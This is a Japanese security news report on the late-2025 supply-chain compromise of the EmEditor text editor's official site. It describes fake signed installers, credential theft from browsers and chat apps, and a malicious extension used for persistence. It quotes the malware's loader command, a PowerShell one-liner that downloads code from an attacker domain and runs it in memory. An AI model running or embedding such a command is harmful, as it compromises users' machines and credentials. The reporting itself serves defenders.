EmEditor ユーザーに侵害の恐れ:正規サイトからのリダイレクトと偽インストーラー

EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack

2025/12/30 CyberSecurityNews — 広く利用されているテキストエディタ EmEditor を標的とする大規模なサプライチェーン攻撃により、数百万人規模のユーザーが高度な情報窃取マルウェアにさらされている。2025年12月19日から12月22日の4日間にわたり、EmEditor の公式 Web サイトが不正に改竄され、無防備なユーザーに対して悪意のインストーラが配布された。”Download Now” ボタンからバージョン 25.4.3 を取得したユーザーが、正規ソフトウェアではなく悪意のファイルを受け取っていたことを EmEditor は確認している。世界中の開発者/システム管理者/技術専門家たちが、深刻なセキュリティ侵害のリスクに直面している。

この攻撃で悪用されたのは、EmEditor のダウンロード経路を制御するリダイレクト・メカニズムである。通常は正規インストーラへ誘導する URL 設定を改竄した攻撃者は、EmEditor の WordPress コンテンツ・ディレクトリ内にホストされた悪意のバージョンへとユーザーを誘導した。

EmEditor Editor (Source - Qianxin)
EmEditor Editor (Source – Qianxin)

この不正なインストーラーへのデジタル署名は、正規の開発元である “Emurasoft Inc.” のものではなく、”WALSHAM INVESTMENTS LIMITED” という非公式の組織によるものだった。

PowerShell (Source - Qianxin)
PowerShell (Source – Qianxin)

この偽装された署名が、インストーラの正当性を装う役割を果たし、多くのユーザーが不審に思わず実行してしまう要因となった。

Qianxin のアナリストたちは、詳細なフォレンジック調査を通じてマルウェアを特定し、インストール・パッケージ内に埋め込まれた包括的な情報窃取ペイロードの存在を明らかにした。

この悪意のコードは、正規の EmEditor の挙動を模倣する高度な設計となっており、インストール中およびインストール後にサイレントに動作しながら、ユーザーの機密データを収集する。

感染メカニズム

このマルウェアの感染チェーンは、埋め込まれた VBScript が PowerShell コマンド “powershell.exe “irm emeditorjp.com | iex”” の実行により開始される。

この手法により、従来のファイルベース検知を回避しながら、システム・メモリ上への悪意のコードの直接ダウンロードと、即時的な実行が可能になる。

取得される情報に含まれるのは、Chrome/Edge/Brave/Opera など主要 Web ブラウザの認証情報であり、それにより、Cookie/ログインデータ/閲覧履歴が窃取される。

さらに、Discord/Slack/Zoom/Microsoft Teams/WinSCP/PuTTY などのアプリケーションの認証情報も標的となるため、企業ユーザーにとって深刻なリスクが生じる。

このマルウェアは、”Google Drive Caching” と称する悪意のブラウザ・エクステンションを用いて永続化を図る。このエクステンションは、初期感染後も不正アクセスを維持するという役割を担う。

Google Drive Caching (Source - Qianxin)
Google Drive Caching (Source – Qianxin)

このエクステンションには、Domain Generation Algorithm (DGA) が組み込まれている。それを用いる攻撃者は、動的に生成される複数のドメインを介して、堅牢な Command and Control (C&C) 通信を確立できる。

さらに、Facebook 広告アカウントの認証情報窃取/仮想通貨アドレス置換攻撃を目的とするクリップボード監視/リモートコマンド実行による追加データ抽出やブラウザ挙動の操作などが可能となる。

影響を受けたユーザーに対して強く推奨されるのは、該当システムを直ちにネットワークから切断し、包括的なマルウェア・スキャンを実施した上で、侵害された可能性のあるすべての認証情報をリセットすることだ。

テキストエディタ EmEditor を狙う攻撃が発見されました。この問題の原因は、公式サイトの “Download Now” ボタンがクリックされたときに、攻撃者が用意した不正なファイルへとユーザーを誘導するという、リダイレクトの仕組みが組み込まれていました。それにより、本来であれば開発元の署名があるべきところに、別組織の署名が付与された、偽のインストーラーが配布されました。この偽のソフトを実行してしまうと、メモリ上で悪意のコードが動き出し、ブラウザやチャット・ツールの機密情報が盗み取られてしまうという状況が生じます。ご利用のチームは、ご注意ください。よろしければ、Phishing での検索結果も、ご参照ください。